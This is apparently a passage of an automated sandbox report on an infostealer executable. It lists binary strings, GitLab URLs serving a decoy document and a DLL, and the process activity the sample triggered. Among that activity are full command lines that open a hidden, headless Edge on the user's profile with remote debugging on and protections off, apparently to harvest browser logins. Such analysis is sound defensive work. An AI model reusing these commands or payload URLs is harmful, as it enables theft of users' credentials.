      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/issues/1416.
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/issues/1731
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/issues/1895vUsing
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/issues/1906.
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/issues/1981
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/issues/2025
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/pull/2125.
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmp, ConDrv.0.drString found in binary or memory: https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?in
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://system.data.sqlite.org/
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://system.data.sqlite.org/X
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://urn.to/r/sds_see12https://urn.to/r/sds_see2
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://urn.to/r/sds_see23https://urn.to/r/sds_see1UInnerVerify
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.newtonsoft.com/json
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://www.sqlite.org/rescode.html
      Source: unknown HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.11:49722 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.11:50005 version: TLS 1.2

      System Summary

      Source: Backup_[United States]_8.46.123.189_[1401].zip.0.dr Zip Entry: encrypted
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Code function: String function: 00007FFEEE1F1F90 appears 31 times
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Code function: String function: 00007FFEEE1C8EA0 appears 206 times
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Code function: String function: 00007FFEEE114970 appears 110 times
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Code function: String function: 00007FFEEE128730 appears 306 times
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameEntityFramework.dllV vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1903981529.00007FF7D3DBD000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameoke.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: get_Language$get_LegalCopyright&get_LegalTrademarks(get_OriginalFilename get_PrivateBuild(get_ProductBuildPart(get_ProductMajorPart(get_ProductMinorPart vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: _legalCopyright"_originalFilename vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Management.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Security.Cryptography.ProtectedData.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Data.SQLite.dllF vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSQLitePCLRaw.provider.e_sqlite3.dllV vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSQLitePCLRaw.core.dllV vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSQLitePCLRaw.batteries_v2.dllV vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000003.1584163889.0000025112142000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWinWord.exeB vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: get_Language$get_LegalCopyright&get_LegalTrademarks(get_OriginalFilename get_PrivateBuild(get_ProductBuildPart(get_ProductMajorPart(get_ProductMinorPart vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: _legalCopyright"_originalFilename vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Management.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Security.Cryptography.ProtectedData.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Data.SQLite.dllF vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSQLitePCLRaw.provider.e_sqlite3.dllV vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSQLitePCLRaw.core.dllV vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSQLitePCLRaw.batteries_v2.dllV vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe Binary or memory string: get_Language$get_LegalCopyright&get_LegalTrademarks(get_OriginalFilename get_PrivateBuild(get_ProductBuildPart(get_ProductMajorPart(get_ProductMinorPart vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe Binary or memory string: _legalCopyright"_originalFilename vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe Binary or memory string: OriginalFilename vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe Binary or memory string: OriginalFilenameSystem.Management.dll@ vs hJ1bl8p7dJ.exe
      Source: classification engine Classification label: mal72.troj.spyw.winEXE@17/12@3/4
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe File created: C:\Users\Public\Documents\638724355399194976
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe File created: C:\Users\user\AppData\Local\Temp\tmp2jco13.tmp
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe File read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: hJ1bl8p7dJ.exe, hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
      Source: hJ1bl8p7dJ.exe, hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
      Source: hJ1bl8p7dJ.exe, hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
      Source: hJ1bl8p7dJ.exe, hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
      Source: hJ1bl8p7dJ.exe, hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
      Source: hJ1bl8p7dJ.exe, 00000000.00000003.1899159896.0000025112163000.00000004.00000020.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000003.1899353321.0000025112229000.00000004.00000020.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000003.1898713858.0000025112229000.00000004.00000020.00020000.00000000.sdmp, Default_LoginDataTemp.db.0.dr, tmp2jco13.tmp.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: hJ1bl8p7dJ.exe, hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
      Source: unknown Process created: C:\Users\user\Desktop\hJ1bl8p7dJ.exe "C:\Users\user\Desktop\hJ1bl8p7dJ.exe"
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1600 --field-trial-handle=1472,i,8808784561077415658,3538669664059517056,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9230 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1604 --field-trial-handle=1412,i,17015067578929256214,2434644396816959813,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: ncrypt.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: dpapi.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: ntasn1.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: icu.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: dhcpcsvc6.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: dhcpcsvc.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: wshunix.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: winrnr.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: nlaapi.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: wshbth.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: devobj.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: napinsp.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: pnrpnsp.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: schannel.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: mskeyprotect.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: ncryptsslp.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: msasn1.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: gpapi.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: edputil.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: policymanager.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: msvcp110_win.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: vcruntime140_1.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: vcruntime140.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: msvcp140.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: vcruntime140_1.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: xmllite.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: mlang.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: appresolver.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: bcp47langs.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: slc.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: sppc.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Section loaded: e_sqlite3.dll
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
      Source: hJ1bl8p7dJ.exe Static PE information: Image base 0x140000000 > 0x60000000
      Source: hJ1bl8p7dJ.exe Static file information: File size 26345984 > 1048576
      Source: hJ1bl8p7dJ.exe Static PE information: Raw size of .managed is bigger than: 0x100000 < 0x82f600
      Source: hJ1bl8p7dJ.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xfb0000
      Source: hJ1bl8p7dJ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: hJ1bl8p7dJ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: hJ1bl8p7dJ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
